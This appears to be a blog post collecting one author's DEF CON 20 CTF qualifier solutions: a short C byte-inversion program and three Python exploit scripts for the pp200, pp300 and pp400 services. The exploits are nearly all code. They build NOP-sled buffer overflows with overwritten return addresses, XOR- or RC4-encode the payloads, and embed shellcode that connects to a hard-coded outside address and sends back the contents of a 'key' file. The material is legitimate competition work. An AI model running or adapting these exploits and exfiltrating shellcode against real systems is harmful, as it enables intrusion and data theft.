
defcon20 bin200

2012. 6. 22. 02:39
#include <stdio.h>

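int main(int argc, char *argv[])
{
	/* Read the challenge file, print it, invert every byte that was read
	 * and print it again.  The original did the inversion with an MSVC
	 * inline-asm loop over a fixed 0x3df bytes; a plain C loop over the
	 * bytes actually read is portable and does not flip the zero padding
	 * when the file is shorter than expected. */
	char fname[] = "c:\\mac.h";
	char buf[1024] = {0};	/* zero-filled so printf("%s") stops after the data */
	FILE* fp;
	size_t ret = 0;		/* number of bytes fread() delivered */
	size_t i;

	(void)argc;
	(void)argv;

	/* NOTE(review): "r" is text mode, which translates CRLF on Windows;
	 * use "rb" if the file holds binary data -- TODO confirm. */
	fp = fopen(fname, "r");
	if (fp == NULL)		/* fopen reports failure with NULL, not a negative pointer */
	{
		printf("fopen error\n");
		return -1;
	}
	/* 991 < sizeof(buf), so at least the last byte stays 0 as terminator. */
	ret = fread(buf, 1, 991, fp);

	printf("buf: %s\n\n", buf);

	/* Bitwise NOT of each byte read (equivalent of the original asm "not bl"). */
	for (i = 0; i < ret; i++)
		buf[i] = (char)~buf[i];

	printf("buf: %s\n", buf);
	fclose(fp);
	return 0;
}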


defcon20 pp400 exploit

2012. 6. 16. 14:14

http://blog.oxff.net/posts/DefCon%2020%20CTF%20Qualifications%3A%20pp400-anvszwpmjdyizhsqgngq.html 참조.



#!/usr/bin/python2.6
#defcon 2012, pp400 exploit - badcob

import socket,sys
import struct
import time

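def rc4_initialize(key,x,y):
    """Build the 256-entry permutation table consumed by ``rc4_pop_key``.

    Starts from the descending table 255..0 and, for 256 rounds, advances
    ``y`` by ``tmp[x]`` plus the key byte ``key[x & 0xf]`` (so only the first
    16 key bytes are ever used) and swaps ``tmp[x]`` with ``tmp[y]``.

    Note that ``x`` is never advanced inside the loop, so every round uses
    the same table slot and the same key byte.  That differs from textbook
    RC4 and is presumably deliberate to match the service's own key
    schedule -- verify before reusing this elsewhere.

    Args:
        key: indexable as ``key[x & 0xf]`` with ``ord()`` applied to the
            element, i.e. a ``str`` (on Python 3 a ``bytes`` key would make
            ``ord`` raise ``TypeError``).
        x: fixed table index, 0..255 (larger values raise ``IndexError``).
        y: starting value of the running index, 0..255.

    Returns:
        A mutable ``list`` of 256 ints.  The original returned a bare
        ``range``, which is not assignable on Python 3; ``list(...)`` is
        the only functional change.
    """
    tmp = list(range(255, -1, -1))
    for _ in range(256):
        y = (y + tmp[x] + ord(key[x & 0xf])) & 0xff
        tmp[x], tmp[y] = tmp[y], tmp[x]

    return tmp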

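def rc4_pop_key(tmp, x, y):
    """Advance the RC4 generator one step and return the next keystream byte.

    ``tmp`` is mutated in place (``tmp[x]`` and ``tmp[y]`` are swapped after
    the indices advance); the updated indices are returned so the caller can
    thread them through successive calls.

    Args:
        tmp: the 256-entry table from ``rc4_initialize`` (mutated in place).
        x: current index, 0..255.
        y: current index, 0..255.

    Returns:
        ``(keystream_byte, x, y)`` with the advanced indices.

    The original masked the final lookup with ``&&``, which is a
    ``SyntaxError`` in Python; the intended bitwise ``& 0xff`` is used here.
    """
    x = (x + 1) & 0xff
    y = (y + tmp[x]) & 0xff
    tmp[x], tmp[y] = tmp[y], tmp[x]
    return tmp[(tmp[x] + tmp[y]) & 0xff], x, y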

#shellcode 
sc = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
sc += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
sc += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

#stack address to overwrite
stack_address = 0xbfbfe9fc  # NOTE: never referenced below; the same literal is repeated in the payload

#make payload
payload = []
sc += '\x90'  # one pad byte so the length is a multiple of 4 for the word split below
print len(sc)

# Split the string into little-endian 32-bit words (struct '<I'); a chunk
# shorter than 4 bytes would make unpack raise, hence the padding above.
while sc != '':
    payload.append(struct.unpack('<I', sc[:4])[0])
    sc = sc[4:]

#nop sled + shellcode
#0x42 : inc edx
payload = [0x90909090 for i in range(0,128-len(payload))] + payload  # NOP words in front, 128 words total
payload += [0x42424242 for i in range(0,248-128)]  # 120 words of 0x42 filler
payload += [0xbfbfe9fc]  # equals stack_address above; use the name to keep the two in sync

total_count = len(payload)  # not read anywhere below
current_count = 0  # advanced once per word in the send loop

#rc4 initialize
global tmp, x, y  # no effect at module scope; kept as in the original
x = 0
y = 0
key = '\xb6\x3d\x15\x3a\x04\x15\x69\x72\x45\xfe\xc2\x7f\x12\x78\xd7\x82'  # 16 bytes; rc4_initialize indexes it with x & 0xf
tmp = rc4_initialize(key,x,y)
print tmp
print len(tmp)

#host, port 
host = '192.168.74.134'  # the author's test host/port
port = 4016

def init(host,port):
    """Open a TCP (IPv4) connection to ``host``:``port`` and return the socket.

    Raises whatever ``socket.connect`` raises on failure.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((host, port))
    return conn

s = init(host,port)

passwd = 'b366e2776ce9efff'+'\x0a'  # first line the service expects; its reply is printed below
s.send(passwd)
print s.recv(256)
sys.stdout.flush()

# For each 32-bit word: reinterpret it as a float, take its decimal text,
# XOR each character with one keystream byte (the text is walked reversed
# and the result reversed back), hex-encode, and send it as one line.
for i in payload:
    print current_count, hex(i)
    data_list = []
    data = str(struct.unpack('<f', struct.pack('<I', i))[0])
    data = data[::-1]
    for j in data:
        value, x, y = rc4_pop_key(tmp, x, y)  # tmp/x/y are module globals, threaded by hand
        data_list.append(chr(ord(j) ^ value))
    data_list.reverse()
    data = ''.join(data_list)
    print data.encode('hex')
    try:
        s.send(data.encode('hex')+'\x0a')
    # NOTE(review): bare except also catches KeyboardInterrupt; only s.send()
    # is inside the try, so the "float error" text really reports a send
    # failure -- narrow this to socket.error.
    except:
        print 'float error:', i, hex(i), '[+]' + data.encode('hex') + '[+]'
        break
    current_count += 1


defcon20 pp300 exploit

2012. 6. 16. 14:10
#!/usr/bin/python2.6
#defcon 2012, pp300 exploit - badcob

import socket, sys
from struct import pack 

def make_connection(host,port):
    """Open a TCP (IPv4) connection to ``host``:``port`` and return the socket.

    Raises whatever ``socket.connect`` raises on failure.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((host, port))
    return conn

def make_payload(scode):
    """Wrap each byte of ``scode`` in a 4-byte ``mov byte ptr [ebp+disp8], imm8``
    instruction and append a ``call ebp`` tail.

    Returns a ``str`` of ``4 * (len(scode) + 1) + 4`` bytes.  The displacement
    comes from ``chr(count)``, so an input longer than 255 bytes raises
    ``ValueError``.
    """
    #padding 1 byte : shellcode length 79byte
    scode += "\x90"

    #move byte ptr ss:[ebp+x], shellcode 1 byte
    mov_byte_ptr = "\xc6\x45"    
    tmp = ''
    count = 0
    for x in scode:
        tmp += mov_byte_ptr + chr(count) + x  # opcode, displacement, immediate
        count += 0x1

    #call ebp
    call_ebp = "\xff\xd5\x90\xff"
    return tmp + call_ebp
    
    
#shellcode
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"  # same bytes as the pp400/pp200 scripts
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

host = "192.168.74.134"  # the author's test host/port
port = 7548

num = "3c56bc31268ac65f" + "\x0a"  # first line sent to the service

#make payload
payload = make_payload(scode)

s = make_connection(host,port) 
s.send(num)
s.send(payload)  # nothing is read back; the socket is left to close at exit


defcon20 pp200 exploit

2012. 6. 16. 14:08
#!/usr/bin/python2.6
#defcon 2012, pp200 exploit - badcob

import socket, sys
from struct import pack 

def make_connection(host,port):
    """Open a TCP (IPv4) connection to ``host``:``port`` and return the socket.

    Raises whatever ``socket.connect`` raises on failure.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((host, port))
    return conn

#shellcode
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"  # same bytes as the pp400/pp300 scripts
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

host = "192.168.74.134"  # the author's test host/port
port = 8912

num = "b74b9d86e6cd3480" + "\x0a"  # first line sent; the reply is printed below
user_id = "a6" + "\x0a"  # second line; the XOR mask used below is also 0xa6
ret = "\xbc\xe2\xbe\xbf"  # 4 bytes appended after the sled (little-endian 0xbfbee2bc)

#make payload
# Layout: 416 NOPs, the shellcode, 17 NOPs, 0x0f, then ret and a newline.
temp = "\x90"*416+scode+"\x90"*17+"\x0f"
temp += ret + "\x0a"

payload = ''

# XOR every byte with 0xa6.  A byte that would become 0x0a (newline) cannot
# be encoded, so the loop stops.  NOTE: it only breaks, and the truncated
# payload is still sent below.
for x in temp:
    a = ord(x)^0xa6
    if a == 0xa:
        print "failed"
        break
    payload += chr(a)

s = make_connection(host,port) 
s.send(num)
print s.recv(128)
s.send(user_id)
print s.recv(128)
s.send(payload)  # nothing is read back; the socket is left to close at exit
